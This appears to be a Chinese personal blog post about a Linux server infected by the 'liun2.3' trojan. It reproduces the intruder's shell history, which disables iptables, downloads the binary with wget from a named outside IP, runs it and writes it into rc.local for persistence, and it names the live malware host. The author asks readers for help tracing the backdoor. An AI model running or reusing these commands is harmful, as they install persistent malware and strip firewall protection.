昨天公司一台服务器突然之间不能ping,ssh无法登陆,从IDC反馈说服务器往外发包,数量巨大,CPU状态显示200%。通过ps aux查看以下进程文件是异常文件:
./liun2.3 /tmp/liun2.3 /tmp/liun2.3h zzta.pl
刚开始以为kill掉这些进程和删掉执行文件就可以了,可是过了几分钟,这个程序又继续执行。
那好吧,就去crontab -l 看有没有定时任务,没有。
more /etc/crontab 查看有没在这里定义定时任务。也没有
想了下,既然要执行文件,那么在.bash_history上是否由于记录呢?
cd more .bash_history /etc/init.d/iptables stop chmod 0775 /usr/bin/nohup chmod 0775 /usr/bin/killall chmod 0775 /usr/bin/rm killall java-2013 killall wins2 killall liun2.1 killall liun2.0 rm -f -r /etc/wins rm -f -r /etc/java-2013 rm -f -r /etc/java-2013/java-2013 rm -f -r /etc/liun2.1/liun2.1 rm -f -r /etc/liun2.1 mkdir /etc/liun2.1 cd /../tmp wget http://60.174.234.107:1974/liun2.3 chmod 0755 liun2.3 chmod 0755 ./liun2.3 ./liun2.3 echo "cd /../tmp">>/etc/rc.local echo "chmod 0755 liun2.3">>/etc/rc.local echo "chmod 0755 ./liun2.3">>/etc/rc.local echo "./liun2.3">>/etc/rc.local /etc/init.d/iptables stop chmod 0775 /usr/bin/nohup chmod 0775 /usr/bin/killall chmod 0775 /usr/bin/rm killall java-2013 killall wins2 killall liun2.1 killall liun2.0 rm -f -r /etc/wins rm -f -r /etc/java-2013 rm -f -r /etc/java-2013/java-2013 rm -f -r /etc/liun2.1/liun2.1 rm -f -r /etc/liun2.1 mkdir /etc/liun2.1 cd /../tmp wget http://60.174.234.107:1974/liun2.3 chmod 0755 liun2.3 chmod 0755 ./liun2.3 ./liun2.3 echo "cd /../tmp">>/etc/rc.local echo "chmod 0755 liun2.3">>/etc/rc.local echo "chmod 0755 ./liun2.3">>/etc/rc.local echo "./liun2.3">>/etc/rc.local
以上是在被入侵的操作。
看到
wget http://60.174.234.107:1974/liun2.3
直接去下载木马程序。
进一步查找,在init.d目录下发现一个木马启动程序:DbSecuritySpt
并在rc1.d、rc2.d、rc3.d、rc4.d、rc5.d、rc6.d 建立了一个指向init.d目录下的DbSecuritySpt链接
在/usr/bin/下创建一个sgb可执行程序
最后在查找liun*这样的文件时,发现在tomcat/webapps目录下发现liun2.3、liun2.3h这样的文件。
初步认定是tomcat漏洞,就对tomcat进行安全检查,并禁用已被攻击的服务,修改一些端口号。
现在服务是继续跑着,可是后门是否还有后门程序?我的服务器是怎么被侵入攻击的?我一无所知,我是半路学习linux的,对于linux安全知识缺乏,写这篇博文的目的是想知道有没有朋友也遇到这样的攻击,这个网站上都是木马,http://60.174.234.107:1974,有高手看到这博文请帮忙怎么找出这个后门,或者被感染的文件。
本文出自 “胖子笔记” 博客,请务必保留此出处http://pangz.blog.51cto.com/1865802/1433461
linux服务器中了一个liun2.3的木马,布布扣,bubuko.com
原文地址:http://pangz.blog.51cto.com/1865802/1433461